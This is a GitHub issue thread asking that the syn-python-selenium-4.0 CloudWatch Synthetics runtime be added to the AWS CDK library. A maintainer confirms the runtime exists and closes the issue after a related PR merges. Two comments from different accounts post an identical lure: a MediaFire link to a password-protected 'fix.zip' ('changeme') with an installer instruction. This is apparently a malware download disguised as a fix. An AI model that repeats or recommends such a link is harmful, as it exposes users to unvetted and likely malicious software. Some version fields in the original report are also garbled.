### ISSUE TITLE
synthetics: synthetics python selenium 4.0 missing in Runtime options

### ISSUE THREAD

**Issue by espixxl** [aws/aws-cdk#31218]
### Describe the bug

[Latests selenium python runtime for canaries available in the library](https://github.com/aws/aws-cdk/blob/823ff6e03899f790a4cb1c43f92a02cc906ac356/packages/aws-cdk-lib/aws-synthetics/lib/runtime.ts#L323) is based on Python 8 which will get deprecated on 14th October 2024. In order to upgrade canaries, AWS recently released the Runtime syn-python-selenium-4.0 which uses Python 3.9, but this is still not available in the latest cdk-lib version v2.154.1.

![image](https://github.com/user-attachments/assets/29fc7446-7f9e-4e62-8b0b-3995e1158506)

### Regression Issue

- [ ] Select this option if this issue appears to be a regression.

### Expected Behavior

All available runtimes using console are also available in the cdk lib

### Current Behavior

Is not possible to upgrade existing canaries in an automated way to use a non deprecated Python version runtime

### Reproduction Steps

For existing canaries, navigate to AWS Cloudwatch -> Synthetics, select the synthetic and on Actions -> Upgrade Runtime and there is the new runtime available.

### Possible Solution

Include the already available canary runtime described in this ticket into a new release of the cdk lib

### CDK CLI Version

v2.154.1

### Node.js Version

v2.154.1.

### OS

cdk

### Language

TypeScript

**Comment by NhutDang2002** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by llowvxe** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by ashishdhingra** [comment]
- Per [Runtime versions using Python and Selenium Webdriver](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Synthetics_Library_python_selenium.html), [syn-python-selenium-4.0](https://docs.aws.amazon.com/AmazonCloudWatch/latest/monitoring/CloudWatch_Synthetics_Library_python_selenium.html#CloudWatch_Synthetics_runtimeversion-syn-python-selenium-4.0) is the latest version of Python Selenium web driver.
- `syn-python-selenium-4.0` is also one of the supported options in AWS CloudWatch Synthetics Canaries console:
  ![Screenshot 2024-08-26 at 9 59 38 AM](https://github.com/user-attachments/assets/c6c00076-6aa4-40ad-8028-1bc6ffc8cc96)

**Comment by ashishdhingra** [comment]
Existing PR https://github.com/aws/aws-cdk/pull/31101.

**Comment by ashishdhingra** [comment]
Closing this issue since related PR https://github.com/aws/aws-cdk/pull/31101 is merged.
